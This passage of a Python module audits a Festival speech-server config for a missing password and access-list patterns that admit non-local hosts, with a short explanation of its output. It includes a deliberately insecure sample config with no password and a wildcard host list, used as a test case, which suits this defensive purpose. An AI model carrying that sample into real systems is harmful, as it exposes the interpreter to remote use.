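STRING_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')

# Assumption: only these access-list patterns are treated as local-only.
# Anything else (e.g. "[^.]+" or "192.168.*") is reported.
LOCAL_ONLY_PATTERNS = {"localhost", "localhost.*", "127.0.0.1"}


def parse_settings(text):
    """Return {name: raw value text} for every (set! ...) line."""
    settings = {}
    for line in text.splitlines():
        if line.lstrip().startswith(";"):
            continue
        m = SET_RE.match(line)
        if m:
            settings[m.group(1)] = m.group(2).strip()
    return settings


def list_strings(raw):
    """String elements of a quoted list such as '("localhost.*" "127.0.0.1");
    nil and '() yield an empty list."""
    if raw in ("nil", "'()"):
        return []
    return STRING_RE.findall(raw)


def audit(text):
    """Return a list of findings; an empty list means both checks passed."""
    settings = parse_settings(text)
    findings = []

    # Assumption: nil or "" means the server accepts clients without a password.
    passwd = settings.get("server_passwd", "nil")
    if passwd in ("nil", '""'):
        findings.append("server_passwd: no password; the interpreter is "
                        "reachable by anyone who can connect to the port")

    # Assumption: an absent or nil access list means no host restriction.
    hosts = list_strings(settings.get("server_access_list", "nil"))
    if not hosts:
        findings.append("server_access_list: empty or nil; no host restriction")
    for pattern in hosts:
        if pattern not in LOCAL_ONLY_PATTERNS:
            findings.append(
                f"server_access_list: pattern {pattern!r} admits non-local hosts")
    return findings


def scheme_string_literal(value):
    """Quote a string for Scheme, escaping backslash and double quote
    (assumption: backslash escapes, as in SIOD)."""
    escaped = value.replace("\\", "\\\\").replace('"', '\\"')
    return f'"{escaped}"'


def password_entry(password):
    """The line a postinst should write, safe for any password characters."""
    return f"(set! server_passwd {scheme_string_literal(password)})"


def mode_is_private(st_mode):
    """True when group and other have no permission bits at all (0600-style)."""
    return (st_mode & 0o077) == 0


# Constructed sample: the thread's shipped defaults with the commented
# example access list enabled.
WEAK_CONFIG = """\
; Server port
(set! server_port 1314)
; Server password
(set! server_passwd nil)
(set! server_access_list '("[^.]+" "127.0.0.1" "localhost.*" "192.168.*"))
"""

# Constructed sample: password set and access restricted to localhost.
HARDENED_CONFIG = """\
(set! server_port 1314)
(set! server_passwd "CHANGE-ME-example")
(set! server_access_list '("localhost.*" "127.0.0.1"))
"""

if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(f"{name}: {audit(cfg) or ['ok']}")
    print(password_entry('pa"ss\\word'))
```

Running the module audits both samples: the weak one yields three findings (no password, and the `[^.]+` and `192.168.*` patterns), the hardened one none. `mode_is_private` takes the `st_mode` from `os.stat("/etc/festival.scm")` and is the check a postinst should make after writing the password, since `chmod og-r` on a file that was created group- or world-readable leaves a window before the chmod runs.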